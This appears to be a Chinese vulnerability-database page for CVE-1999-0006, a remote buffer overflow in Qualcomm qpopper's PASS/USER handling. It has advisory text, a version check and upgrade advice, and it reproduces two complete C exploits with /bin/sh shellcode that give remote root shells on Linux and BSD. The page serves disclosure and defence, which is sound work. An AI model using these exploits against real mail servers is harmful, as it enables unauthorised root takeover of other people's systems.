CVE-1999-0006
CVSS10.0
发布时间 :1998-07-14 00:00:00
修订时间 :2008-09-09 08:33:31
NMCOES    

[原文]Buffer overflow in POP servers based on BSD/Qualcomm's qpopper allows remote attackers to gain root access using a long PASS command.


[CNNVD]Qualcomm QPopper多个命令远程缓冲区溢出漏洞(CNNVD-199807-013)

        
        QPopper是一款由Qualcomm开发和维护免费开放源代码的软件,可使用在多种Linux和Unix操作系统下。
        2.5版本以前的qpopper存在许多缓冲区溢出漏洞,远程攻击者可以利用这些漏洞通过溢出攻击在受影响主机执行任意指令。
        漏洞存在于qpopper没有正确检查过滤用户输入的POP命令(包括USER、PASS),如果参数超过1024字节就会产生缓冲区溢出。这个漏洞在Bugtraq被广泛的讨论,已经有基于Linux和*BSD系统的攻击程序。
        确认主机是否受影响,可以使用下面的命令:
        % telnet yourmailhost.your.domain.com 110
        Trying 123.123.123.123
        Connected to mailhost
        +OK QPOP (version 2.4) at yourmailhost.your.domain.com starting
        如果返回的版本是2.5以前(包括2.5 beta),那么说明你的主机受影响,请尽快升级到最新版本。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0006
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0006
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199807-013
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/133
(UNKNOWN)  BID  133
ftp://patches.sgi.com/support/free/security/advisories/19980801-01-I
(UNKNOWN)  SGI  19980801-01-I

- 漏洞信息

Qualcomm QPopper多个命令远程缓冲区溢出漏洞
危急 其他
1998-07-14 00:00:00 2005-05-02 00:00:00
远程  
        
        QPopper是一款由Qualcomm开发和维护免费开放源代码的软件,可使用在多种Linux和Unix操作系统下。
        2.5版本以前的qpopper存在许多缓冲区溢出漏洞,远程攻击者可以利用这些漏洞通过溢出攻击在受影响主机执行任意指令。
        漏洞存在于qpopper没有正确检查过滤用户输入的POP命令(包括USER、PASS),如果参数超过1024字节就会产生缓冲区溢出。这个漏洞在Bugtraq被广泛的讨论,已经有基于Linux和*BSD系统的攻击程序。
        确认主机是否受影响,可以使用下面的命令:
        % telnet yourmailhost.your.domain.com 110
        Trying 123.123.123.123
        Connected to mailhost
        +OK QPOP (version 2.4) at yourmailhost.your.domain.com starting
        如果返回的版本是2.5以前(包括2.5 beta),那么说明你的主机受影响,请尽快升级到最新版本。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时关闭pop服务,或者在边界防火墙设置策略,只允许可信用户访问。
        厂商补丁:
        Qualcomm
        --------
        请到厂商下载当前最新版本:
        ftp://ftp.qualcomm.com/

- 漏洞信息 (19109)

Qualcomm qpopper 2.4 POP Server Buffer Overflow Vulnerability (1) (EDBID:19109)
linux remote
1998-06-27 Verified
0 Seth McGann
N/A [点击下载]
source: http://www.securityfocus.com/bid/133/info

A number of buffer-overflow issues reside in versions prior to 2.5 of Qualcomm's 'qpopper' program. Exploiting this issue allows a remote attacker to execute arbitrary commands on hosts that are running a vulnerable version. 

To determine if you are vulnerable, telnet to port 110 on the possibly vulnerable host. A banner appears, informing you of the version of the pop server. For example: 

% telnet yourmailhost.your.domain.com 110 
Trying 123.123.123.123 
Connected to mailhost 
+OK QPOP (version 2.4) at yourmailhost.your.domain.com starting 

If any version prior to 2.5 is reported, including 2.5 beta, you should upgrade immediately to the latest version.

/* Exploit for qpopper 2.4 (and others) for Linux
 *   by [WaR] (warchild@cryogen.com) and zav (zav@cryogen.com)
 *
 *  usage: (./qpopper <offset>;cat)|nc <victim> 110
 *       with offset around 1000 (try increments of 50)
 *
 *
 *    shout outs to: Zef and YZF
 */

#include <stdio.h>
#include <stdlib.h>

#define BUFFSIZE 998

char shell[] =
   "\xeb\x33\x5e\x89\x76\x08\x31\xc0"
   "\x88\x66\x07\x83\xee\x02\x31\xdb"
   "\x89\x5e\x0e\x83\xc6\x02\xb0\x1b"
   "\x24\x0f\x8d\x5e\x08\x89\xd9\x83"
   "\xee\x02\x8d\x5e\x0e\x89\xda\x83"
   "\xc6\x02\x89\xf3\xcd\x80\x31\xdb"
   "\x89\xd8\x40\xcd\x80\xe8\xc8\xff"
   "\xff\xff/bin/sh";

unsigned long esp()
{
  __asm__(" movl %esp,%eax ");
}

main(int argc, char **argv)
{
  int i,j,offset;
  unsigned long eip;
  char buffer[4096];

  j=0;
  offset=atoi(argv[1]);
  eip=esp()+offset;
  for(i=0;i<1008;i++) buffer[i]=0x90;
  for(i=(BUFFSIZE - strlen(shell));i<BUFFSIZE;i++) buffer[i]=shell[j++];

  i=1005;
  buffer[i]=eip & 0xff;
  buffer[i+1]=(eip >> 8) & 0xff;
  buffer[i+2]=(eip >> 16) & 0xff;
  buffer[i+3]=(eip >> 24) & 0xff;

  printf("%s\nsh -i\n",buffer);
}		

- 漏洞信息 (19110)

Qualcomm qpopper 2.4 POP Server Buffer Overflow Vulnerability (2) (EDBID:19110)
unix remote
1998-06-27 Verified
0 Miroslaw Grzybek
N/A [点击下载]
source: http://www.securityfocus.com/bid/133/info
 
A number of buffer-overflow issues reside in versions prior to 2.5 of Qualcomm's 'qpopper' program. Exploiting this issue allows a remote attacker to execute arbitrary commands on hosts that are running a vulnerable version.
 
To determine if you are vulnerable, telnet to port 110 on the possibly vulnerable host. A banner appears, informing you of the version of the pop server. For example:
 
% telnet yourmailhost.your.domain.com 110
Trying 123.123.123.123
Connected to mailhost
+OK QPOP (version 2.4) at yourmailhost.your.domain.com starting
 
If any version prior to 2.5 is reported, including 2.5 beta, you should upgrade immediately to the latest version.

/*
 *      QPOPPER - remote root exploit
 *      by Miroslaw Grzybek <mig@zeus.polsl.gliwice.pl>
 *
 *              - tested against: FreeBSD 3.0
 *                                FreeBSD 2.2.x
 *                                BSDI BSD/OS 2.1
 *              - offsets: FreeBSD with qpopper 2.3 - 2.4    0
 *                         FreeBSD with qpopper 2.1.4-R3     900
 *                         BSD/OS  with qpopper 2.1.4-R3     1500
 *
 *      this is for EDUCATIONAL purposes ONLY
 */

#include        <stdio.h>
#include        <stdlib.h>
#include        <sys/time.h>
#include        <sys/types.h>
#include        <unistd.h>
#include        <sys/socket.h>
#include        <netinet/in.h>
#include        <netdb.h>

#include        <sys/errno.h>

char *shell="\xeb\x32\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x12\x89\x5e\x17"
            "\x88\x5e\x1c\x8d\x1e\x89\x5e\x0e\x31\xc0\xb0\x3b\x8d\x7e"
            "\x0e\x89\xfa\x89\xf9\xbf\x10\x10\x10\x10\x29\x7e\xf5\x89"
            "\xcf\xeb\x01\xff\x62\x61\x63\x60\xeb\x1b\xe8\xc9\xff\xff"
            "\xff/bin/sh\xaa\xaa\xaa\xaa\xff\xff\xff\xbb\xbb\xbb\xbb"
            "\xcc\xcc\xcc\xcc\x9a\xaa\xaa\xaa\xaa\x07\xaa";

#define ADDR 0xefbfd504
#define OFFSET 0
#define BUFLEN 1200

char    buf[BUFLEN];
int     offset=OFFSET;

int     sock;
struct  sockaddr_in sa;
struct  hostent *hp;

void main (int argc, char *argv[]) {
        int i;

        if(argc<2) {
                printf("Usage: %s <IP | HOSTNAME> [offset]\n",argv[0]);
                exit(0);
        }
        if(argc>2)
                offset=atoi(argv[2]);

        /* Prepare buffer */
        memset(buf,0x90,BUFLEN);
        memcpy(buf+800,shell,strlen(shell));
        for(i=901;i<BUFLEN-4;i+=4)
                *(int *)&buf[i]=ADDR+offset;
        buf[BUFLEN]='\n';

        /* Resolve remote hostname & connect*/
        if((hp=(struct hostent *)gethostbyname(argv[1]))==NULL) {
                perror("gethostbyname()");
                exit(0);
        }

        if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
                perror("socket()");
                exit(0);
        }
        sa.sin_family=AF_INET;
        sa.sin_port=htons(110);
        memcpy((char *)&sa.sin_addr,(char *)hp->h_addr,hp->h_length);
        if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=0) {
                perror("connect()");
                exit(0);
        }
        printf("CONNECTED TO %s... SENDING DATA\n",argv[1]); fflush(stdout);
        /* Write evil data */
        write(sock,buf,strlen(buf));

        /* Enjoy root shell ;) */
        while(1) {
                fd_set input;

                FD_SET(0,&input);
                FD_SET(sock,&input);
                if((select(sock+1,&input,NULL,NULL,NULL))<0) {
                        if(errno==EINTR) continue;
                        printf("CONNECTION CLOSED...\n"); fflush(stdout);
                        exit(1);
                }
                if(FD_ISSET(sock,&input))
                        write(1,buf,read(sock,buf,BUFLEN));
                if(FD_ISSET(0,&input))
                        write(sock,buf,read(0,buf,BUFLEN));
        }
}		

- 漏洞信息

912
Qualcomm POP Server (Qpopper) PASS Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Vendor Verified

- 漏洞描述

- 时间线

1998-06-28 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 4.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Qualcomm POP Server Buffer Overflow Vulnerability
Boundary Condition Error 133
Yes No
1998-06-27 12:00:00 2007-07-06 07:47:00
The original warning about the widespread availability of an exploit for this vulnerability was posted to Bugtraq by Seth McGann (smm@WPI.EDU) on June 27th, 1998. Discussion continued on Bugtraq for several weeks thereafter. An exploit for Linux was post

- 受影响的程序版本

Qualcomm qpopper 2.4

- 漏洞讨论

A number of buffer-overflow issues reside in versions prior to 2.5 of Qualcomm's 'qpopper' program. Exploiting this issue allows a remote attacker to execute arbitrary commands on hosts that are running a vulnerable version.

To determine if you are vulnerable, telnet to port 110 on the possibly vulnerable host. A banner appears, informing you of the version of the pop server. For example:

% telnet yourmailhost.your.domain.com 110
Trying 123.123.123.123
Connected to mailhost
+OK QPOP (version 2.4) at yourmailhost.your.domain.com starting

If any version prior to 2.5 is reported, including 2.5 beta, you should upgrade immediately to the latest version.

- 漏洞利用

The following exploit code is available:

- 解决方案

Upgrade to the most current version of qpopper, which is available at:

ftp://ftp.qualcomm.com/

Individual vendor responses can be found in CERT advisory CA-98.08.

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站